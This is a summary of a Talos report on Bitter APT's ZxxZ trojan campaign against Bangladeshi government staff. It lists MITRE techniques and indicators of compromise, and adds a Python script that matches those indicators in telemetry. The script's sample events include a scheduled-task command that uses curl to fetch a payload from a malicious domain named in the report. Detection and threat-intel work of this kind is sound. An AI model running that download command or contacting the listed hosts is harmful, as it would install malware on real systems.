Cisco Talos detects an ongoing Bitter APT operation targeting Bangladesh since August 2021, featuring a new Trojan called ZxxZ with remote file execution capabilities. The campaign employs spear-phishing with Office exploits and a C2 infrastructure that uses AWS Global Accelerator to conceal activity and download additional tools. #BitterAPT #ZxxZ #Bangladesh #RapidActionBattalion
Keypoints
- The Bitter APT group is targeting Bangladeshi government personnel, marking a regional shift in their victims.
- A new trojan named ZxxZ is used, with remote file execution capabilities and downloader functionality.
- The campaign leverages spear-phishing emails with malicious RTF or Excel attachments to deliver the malware.
- The malicious documents exploit known Office vulnerabilities (CVE-2017-11882, CVE-2018-0798, CVE-2018-0802) via the Equation Editor to run shellcode.
- The attackers host the trojan on compromised hosting infrastructure and use C2 servers such as helpdesk.autodefragapp.com, resolving to 99.83.154.118 (an AWS Global Accelerator IP).
- The infection chain includes scheduled tasks and the use of cURL to download the trojan/dropper (ZxxZ) in Windows environments.
- Attribution to Bitter (T-APT-17) is based on C2 reuse and payload string similarities, with moderate confidence.
MITRE Techniques
- [T1566.001] Spearphishing Attachment: The campaign targets Bangladeshi government personnel with spear-phishing emails. "The emails contain either a malicious RTF document or a Microsoft Excel spreadsheet" and the lure patterns align with prior campaigns.
- [T1203] Exploitation for Client Execution: The maldocs exploit the Office vulnerabilities described by CVE-2017-11882, CVE-2018-0798 and CVE-2018-0802; the Equation Editor is launched to run the embedded shellcode.
- [T1105] Ingress Tool Transfer: The trojan is downloaded from the hosting server and run on the victim's machine.
- [T1053.005] Scheduled Task: The infection chain uses the Task Scheduler to configure two scheduled tasks that download and execute ZxxZ.
- [T1071.001] Web Protocols: The trojan downloads payloads over HTTP from the hosting infrastructure.
- [T1071.004] Application Layer Protocol: DNS: The actors use DNS to resolve the C2 hostname (helpdesk.autodefragapp.com) before contacting the C2.
- [T1057] Process Discovery: The malware searches for antivirus processes (Windows Defender and Kaspersky) as part of its defense evasion.
- [T1082] System Information Discovery: The malware gathers the hostname, OS product name and username for exfiltration and target tailoring.
- [T1027] Obfuscated/Compressed Files: The malware uses encoding/obfuscation to hide the strings used in WinMain.
Indicators of Compromise
- [Domains]: autodefragapp.com, helpdesk.autodefragapp.com, olmajhnservice.com, tomcruefrshsvc.com, levarisnetqlsvc.net, urocakpmpanel.com
- [IP Addresses]: 99.83.154.118
- [URLs]: http://autodefragapp.com/, http://olmajhnservice.com/updateReqServ10893x.php?x=035347, http://olmajhnservice.com/nxl/nx
- [SSL Certificate Thumbprints]: 0cbf8c7ff9faf01a9b5c3874e9a9d49cbbf5037b, 25092b60d972e574ed593a468564de2394fa008b
- [File Names]: Update.exe, ntfsc.exe, nx
- [Payload Hashes]: fa0ed2faa3da831976fee90860ac39d50484b20bee692ce7f0ec35a15670fa92, 3fdf291e39e93305ebc9df19ba480ebd60845053b0b606a620bf482d0f09f4d3
- [Documents]: b0b687977eee41ee7c3ed0d9d179e8c00181f0c0db64eebc0005a5c6325e8a82, f7ed5eec6d1869498f2fca8f989125326b2d8cee8dcacf3bc9315ae7566963db
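As an added example (not code from Talos or from this summary), the Python script below turns the indicators listed above and the scheduled-task-plus-cURL download step from the infection chain into a small matcher that runs over JSON-lines telemetry. The event schema (type, host, query, answer, image, cmdline, path, sha256) and the five sample events are constructed for illustration and are not data from the report; domain matching also covers subdomains of each listed domain, as DNS-based blocking would.

```python
"""Match ZxxZ campaign IOCs and the schtasks+curl download behaviour
against JSON-lines telemetry. Added example; the event schema and the
sample events are assumptions, not Talos data."""
import json
import re

# Indicators published in the Talos report (as listed on this page).
DOMAINS = {
    "autodefragapp.com", "helpdesk.autodefragapp.com", "olmajhnservice.com",
    "tomcruefrshsvc.com", "levarisnetqlsvc.net", "urocakpmpanel.com",
}
IPS = {"99.83.154.118"}
SHA256 = {
    "fa0ed2faa3da831976fee90860ac39d50484b20bee692ce7f0ec35a15670fa92",
    "3fdf291e39e93305ebc9df19ba480ebd60845053b0b606a620bf482d0f09f4d3",
    "b0b687977eee41ee7c3ed0d9d179e8c00181f0c0db64eebc0005a5c6325e8a82",
    "f7ed5eec6d1869498f2fca8f989125326b2d8cee8dcacf3bc9315ae7566963db",
}
FILE_NAMES = {"update.exe", "ntfsc.exe", "nx"}

HOST_RE = re.compile(r"(?i)\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b")
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SHA256_RE = re.compile(r"\b[0-9a-f]{64}\b")
# Last path component of Windows paths and URL paths (stops at quotes/space).
BASENAME_RE = re.compile(r"[\\/]([^\\/\s\"']+)")

# Constructed sample telemetry (assumed schema); lines 1-3 are one infected
# host, lines 4-5 are benign noise that must not fire.
SAMPLE_EVENTS = [
    r'{"type": "dns", "host": "WS-042", "query": "helpdesk.autodefragapp.com", "answer": "99.83.154.118"}',
    r'{"type": "process", "host": "WS-042", "image": "C:\\Windows\\System32\\schtasks.exe", "cmdline": "schtasks /create /sc minute /mo 5 /tn Update /tr \"curl http://olmajhnservice.com/nxl/nx -o C:\\Users\\Public\\Update.exe\""}',
    r'{"type": "file", "host": "WS-042", "path": "C:\\Users\\Public\\Update.exe", "sha256": "fa0ed2faa3da831976fee90860ac39d50484b20bee692ce7f0ec35a15670fa92"}',
    r'{"type": "dns", "host": "WS-017", "query": "updates.example.com", "answer": "203.0.113.10"}',
    r'{"type": "process", "host": "WS-017", "image": "C:\\Windows\\System32\\schtasks.exe", "cmdline": "schtasks /query /tn Backup"}',
]


def domain_hits(text):
    """Hostnames in text that equal a listed domain or are a subdomain of one."""
    hits = set()
    for host in HOST_RE.findall(text):
        h = host.lower()
        if any(h == d or h.endswith("." + d) for d in DOMAINS):
            hits.add(h)
    return hits


def task_download_hit(event):
    """T1053.005 + T1105: schtasks.exe creating a task whose action runs curl."""
    if event.get("type") != "process":
        return False
    image = event.get("image", "").lower()
    cmd = event.get("cmdline", "").lower()
    return image.endswith("schtasks.exe") and "/create" in cmd and "curl" in cmd


def scan(lines):
    """Return [(line_no, [reason, ...]), ...] for events that match."""
    findings = []
    for n, line in enumerate(lines, 1):
        if not line.strip():
            continue
        ev = json.loads(line)
        # Flatten all field values into one searchable string.
        blob = " ".join(str(v) for v in ev.values())
        reasons = [f"domain:{d}" for d in sorted(domain_hits(blob))]
        reasons += [f"ip:{ip}" for ip in sorted(set(IP_RE.findall(blob)) & IPS)]
        reasons += [f"sha256:{h[:12]}" for h in sorted(set(SHA256_RE.findall(blob.lower())) & SHA256)]
        names = {m.lower() for m in BASENAME_RE.findall(blob)}
        reasons += [f"filename:{nm}" for nm in sorted(names & FILE_NAMES)]
        if task_download_hit(ev):
            reasons.append("ttp:schtasks+curl (T1053.005/T1105)")
        if reasons:
            findings.append((n, reasons))
    return findings


if __name__ == "__main__":
    for line_no, reasons in scan(SAMPLE_EVENTS):
        print(f"line {line_no}: {', '.join(reasons)}")
```

The behavioural rule fires on the creation of a scheduled task whose action invokes cURL, independent of any indicator, so it still catches a re-hosted payload after the domains rotate; the short file name "nx" is a weak indicator on its own and should be correlated with the other hits rather than alerted on alone.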
Read more: https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html